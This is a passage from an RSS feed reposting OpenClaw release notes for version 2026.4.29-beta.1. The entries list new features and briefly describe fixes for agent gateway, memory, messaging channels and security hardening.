<li>Gateway/startup: skip inherited workspace startup memory for sandboxed spawned sessions without real-workspace write access, so <code>/new</code> no longer preloads host workspace memory into isolated child runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344082702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73611" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73611/hovercard" href="https://github.com/openclaw/openclaw/pull/73611">#73611</a>) Thanks @drobison00.</li>
<li>Agents/tool policy: validate caller group IDs against session or spawned context before applying group-scoped tool policies or persisting gateway group metadata, so forged group IDs cannot unlock more permissive tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345261616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73720/hovercard" href="https://github.com/openclaw/openclaw/pull/73720">#73720</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Commands: keep channel-prefixed owner allowlist entries scoped to matching providers so webchat command contexts cannot inherit external channel owners. Thanks @zsxsoft.</li>
<li>Auth/device pairing: bound bootstrap handoff token issuance, redemption, and approved pairing baselines to the documented per-role scope allowlist, so bootstrap approvals cannot persistently grant <code>operator.admin</code>, <code>operator.pairing</code>, or <code>node.exec</code> scopes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Providers/GitHub Copilot: support the GUI/RPC wizard device-code auth flow so onboarding from non-TTY clients (gateway RPC bridge, GUI wizards) completes instead of returning empty profiles. Dangerous-state handling now distinguishes <code>access_denied</code> and <code>expired_token</code> from transport errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340731383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73290" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73290/hovercard" href="https://github.com/openclaw/openclaw/pull/73290">#73290</a>) Thanks @indierawk2k2.</li>
<li>Installer/Linux: warn before switching an unwritable npm global prefix to <code>~/.npm-global</code>, then tell users to run future global updates with <code>npm i -g openclaw@latest</code> without <code>sudo</code> so npm keeps using the redirected user prefix. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067034134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44365/hovercard" href="https://github.com/openclaw/openclaw/issues/44365">#44365</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102245984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50479" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50479/hovercard" href="https://github.com/openclaw/openclaw/pull/50479">#50479</a>. Thanks @Sayeem3051.</li>
<li>Gateway/plugins: enable the native <code>require()</code> fast path on Windows for bundled plugin modules so plugin loading uses <code>require()</code> instead of Jiti's transform pipeline, reducing startup from ~39s to ~2s on typical 6-plugin setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288746847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68656/hovercard" href="https://github.com/openclaw/openclaw/issues/68656">#68656</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348588169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74173/hovercard" href="https://github.com/openclaw/openclaw/pull/74173">#74173</a>) Thanks @galiniliev.</li>
<li>macOS app: detect stale Gateway TLS certificate pins, automatically repair trusted Tailscale Serve rotations, and surface paired-but-disconnected Mac companion nodes so partial Gateway connections no longer look healthy. Thanks @guti.</li>
</ul>
<h2>2026.4.27</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw 2026.4.29-beta.1]]></title>
<description><![CDATA[2026.4.29
Highlights

Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks @vincentkoc, @scoootscooob, @samzong, and @vignesh07.
Memory grows into a peo...]]></description>
<link>https://tsecurity.de/de/3477041/downloads/openclaw-2026429-beta1/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3477041/downloads/openclaw-2026429-beta1/</guid>
<pubDate>Thu, 30 Apr 2026 11:46:00 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.29</h2>
<h3>Highlights</h3>
<ul>
<li>Messaging and automation get active-run steering by default, visible-reply enforcement, spawned subagent routing metadata, and opt-in follow-up commitments for heartbeat-delivered reminders. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Memory grows into a people-aware wiki with provenance views, per-conversation Active Memory filters, partial recall on timeout, and bounded REM preview diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Provider/model coverage expands with NVIDIA onboarding/catalogs plus faster manifest-backed model/auth paths, Bedrock Opus 4.7 thinking parity, and safer Codex/OpenAI-compatible replay and streaming behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/prasad-yashdeep/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/prasad-yashdeep">@prasad-yashdeep</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/woodhouse-bot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/woodhouse-bot">@woodhouse-bot</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LyHug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LyHug">@LyHug</a>.</li>
<li>Gateway and packaged-plugin reliability focuses on slow-host startup, reusable model catalogs, event-loop readiness diagnostics, runtime-dependency repair, stale-session recovery, and version-scoped update caches. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lpendeavors/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lpendeavors">@lpendeavors</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DerFlash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DerFlash">@DerFlash</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jhsmith409/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jhsmith409">@jhsmith409</a>.</li>
<li>Channel fixes cluster around Slack Block Kit limits, Telegram proxy/webhook/polling/send resilience, Discord startup/rate-limit handling, WhatsApp delivery/liveness, and Microsoft Teams/Matrix/Feishu edge cases. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/slackapi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/slackapi">@slackapi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/djgeorg3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/djgeorg3">@djgeorg3</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dseravalli/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dseravalli">@dseravalli</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nklock/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nklock">@nklock</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alex-xuweilong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alex-xuweilong">@alex-xuweilong</a>.</li>
<li>Security and operations add OpenGrep scanning, sharper GHSA triage policy, safer exec/pairing/owner-scope handling, Docker/onboarding automation, and web-fetch IPv6 ULA opt-in for trusted proxy stacks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jeffrey701/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jeffrey701">@jeffrey701</a>.</li>
</ul>
<h2>2026.4.29</h2>
<h3>Changes</h3>
<ul>
<li>Agents/commitments: add opt-in inferred follow-up commitments with hidden batched extraction, per-agent/per-channel scoping, heartbeat delivery, CLI management, a simple <code>commitments.enabled</code>/<code>commitments.maxPerDay</code> config, and heartbeat-interval due-time clamping so magical check-ins do not echo immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348684831" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74189" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74189/hovercard" href="https://github.com/openclaw/openclaw/pull/74189">#74189</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vignesh07/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vignesh07">@vignesh07</a>.</li>
<li>Messages/queue: make <code>steer</code> drain all pending Pi steering messages at the next model boundary, keep legacy one-at-a-time steering as <code>queue</code>, and add a dedicated steering queue docs page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages/queue: default active-run queueing to <code>steer</code> with a 500ms followup fallback debounce, and document the queue modes, precedence, and drop policies on the command queue page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Messages: add global <code>messages.visibleReplies</code> so operators can require visible output to go through <code>message(action=send)</code> for any source chat, while <code>messages.groupChat.visibleReplies</code> stays available as the group/channel override. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Gateway/events: surface <code>spawnedBy</code> on subagent chat and agent broadcast payloads so clients can route child session events without an extra session lookup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226049569" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63244" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63244/hovercard" href="https://github.com/openclaw/openclaw/pull/63244">#63244</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Memory/wiki: add agent-facing people wiki metadata, canonical aliases, person cards, relationship graphs, privacy/provenance reports, evidence-kind drilldown, and search modes for person lookup, question routing, source evidence, and raw claims. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Active Memory: add optional per-conversation <code>allowedChatIds</code> and <code>deniedChatIds</code> filters so operators can enable recall only for selected direct, group, or channel conversations while keeping broad sessions skipped. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4280170574" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67977" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67977/hovercard" href="https://github.com/openclaw/openclaw/pull/67977">#67977</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/quengh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/quengh">@quengh</a>.</li>
<li>Active Memory: return bounded partial recall summaries when the hidden memory sub-agent times out, including the default temporary-transcript path, so useful recovered context is not discarded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340395145" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73219/hovercard" href="https://github.com/openclaw/openclaw/pull/73219">#73219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joeykrug/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joeykrug">@joeykrug</a>.</li>
<li>Gateway/memory: add a read-only <code>doctor.memory.remHarness</code> RPC so operator clients can preview bounded REM dreaming output without running mutation paths. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263469272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66673" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66673/hovercard" href="https://github.com/openclaw/openclaw/pull/66673">#66673</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Providers/NVIDIA: add the NVIDIA provider with API-key onboarding, setup docs, static catalog metadata, and literal model-ref picker support so NVIDIA hosted models can be selected with their provider prefix intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4324848945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71204" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71204/hovercard" href="https://github.com/openclaw/openclaw/pull/71204">#71204</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Models: suppress explicitly configured openai-codex/gpt-5.4-mini inline entries so a stale models config written by <code>openclaw doctor --fix</code> cannot bypass the manifest capability block and cause repeated assistant-turn failures when the runtime switches to that model on ChatGPT-backed Codex accounts. Conditional suppressions (e.g. qwen Coding Plan endpoint guards) remain bypassable by explicit user configuration. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351824827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74451" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74451/hovercard" href="https://github.com/openclaw/openclaw/issues/74451">#74451</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/0xCyda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/0xCyda">@0xCyda</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Marvae/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Marvae">@Marvae</a>.</li>
<li>Added SQLite-backed plugin state store (<code>api.runtime.state.openKeyedStore</code>) for restart-safe keyed registries with TTL, eviction, and automatic plugin isolation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Plugin SDK: mark remaining legacy alias exports and diffs tool/config aliases with deprecation metadata, and add a guard so future legacy alias comments require <code>@deprecated</code> tags. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/QR/dependencies: internalize small terminal progress and QR wrapper helpers while keeping the real QR encoder dependency direct, reducing the default runtime dependency graph without changing QR output behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Dependencies: refresh workspace runtime, plugin, and tooling packages, including ACP, Pi, AWS SDK, TypeBox, pnpm, oxlint, oxfmt, jsdom, pdfjs, ciao, and tokenjuice, while keeping patched ACP behavior and lint gates current. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mariozechner/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mariozechner">@mariozechner</a>.</li>
<li>Gateway/dev: run <code>pnpm gateway:watch</code> through a named tmux session by default, with <code>gateway:watch:raw</code> and <code>OPENCLAW_GATEWAY_WATCH_TMUX=0</code> for foreground mode, so repeated starts respawn an inspectable watcher without trapping the invoking agent shell. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/diagnostics: emit an opt-in startup diagnostics timeline that records gateway lifecycle and plugin-load phases behind a config flag, so slow-start diagnosis no longer requires bespoke instrumentation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Control UI/i18n: extend the locale registry with new Persian (fa), Dutch (nl), Vietnamese (vi), Italian (it), Arabic (ar), and Thai (th) entries and ship <code>fa</code>, <code>nl</code>, <code>vi</code>, and <code>zh-TW</code> docs glossaries, so the docs translation pipeline and the Control UI language picker stay aligned across surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels: add Yuanbao channel docs entrance so the Tencent Yuanbao bot appears in the channel listing and sidebar navigation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341969080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73443/hovercard" href="https://github.com/openclaw/openclaw/pull/73443">#73443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Channels/Yuanbao: update plugin GitHub location to YuanbaoTeam/yuanbao-openclaw-plugin and add "yuanbao" alias to channel catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349371764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74253" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74253/hovercard" href="https://github.com/openclaw/openclaw/pull/74253">#74253</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Docker setup: add <code>OPENCLAW_SKIP_ONBOARDING</code> so automated Docker installs can skip the interactive onboarding step while still applying gateway defaults. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4148855578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55518" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/55518/hovercard" href="https://github.com/openclaw/openclaw/pull/55518">#55518</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jinjimz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jinjimz">@jinjimz</a>.</li>
<li>Security policy: classify media/base64 decode and format-conversion overhead after configured acceptance limits as performance-only for GHSA triage unless a report demonstrates a limit bypass, crash, exhaustion, data exposure, or another boundary bypass. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350238747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74311" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74311/hovercard" href="https://github.com/openclaw/openclaw/pull/74311">#74311</a>)</li>
<li>Security/OpenGrep: add a precise OpenGrep rulepack, source-rule compiler, provenance metadata check, and PR/full scan workflows that validate first-party code and rulepack-only changes while uploading SARIF to GitHub Code Scanning. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299142364" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69483" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69483/hovercard" href="https://github.com/openclaw/openclaw/pull/69483">#69483</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Security/outbound: strip re-formed HTML tags during plain-text sanitization so nested tag fragments cannot leave a CodeQL-detected <code>&lt;script&gt;</code> sequence behind. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/secrets: compare credential bytes with padded timing-safe buffers instead of hashing candidate passwords before equality checks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/QQBot: sanitize debug log arguments before writing to <code>console.*</code>, so gateway payload fields cannot forge extra log lines when debug logging is enabled. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot: unify slash command auth and c2cOnly gating in the command registry, pass <code>allowQQBotDataDownloads</code> when sending slash command file attachments, align clear-storage with actual downloads directory, and add <code>/bot-me</code> to display sender user ID. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344118368" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73616" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73616/hovercard" href="https://github.com/openclaw/openclaw/pull/73616">#73616</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>CLI/agents/status: keep <code>openclaw agents</code>, text <code>agents list</code>, and plain text <code>status</code> on read-only metadata paths so human output no longer preloads plugin runtimes or live channel scans before printing. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348784023" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74195" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74195/hovercard" href="https://github.com/openclaw/openclaw/issues/74195">#74195</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NianJiuZst/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NianJiuZst">@NianJiuZst</a>.</li>
<li>Agents/local models: derive context-window guard thresholds from the effective model window with 4k/8k safety floors, so small local models are no longer rejected by fixed 16k/32k preflight cutoffs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4056859962" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42999" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42999/hovercard" href="https://github.com/openclaw/openclaw/issues/42999">#42999</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chengjialu8888/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chengjialu8888">@chengjialu8888</a>.</li>
<li>PDF extraction: resolve PDF.js standard fonts from the installed package root and pass a filesystem path to the Node fallback extractor, so built-in font PDFs render without <code>file://</code> URL lookup failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111579816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51455" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51455/hovercard" href="https://github.com/openclaw/openclaw/issues/51455">#51455</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320477272" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70936" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70936/hovercard" href="https://github.com/openclaw/openclaw/pull/70936">#70936</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4134943079" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54447" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/54447/hovercard" href="https://github.com/openclaw/openclaw/pull/54447">#54447</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214513630" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62175" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62175/hovercard" href="https://github.com/openclaw/openclaw/pull/62175">#62175</a>. Thanks <a class="user-mention notranslate" 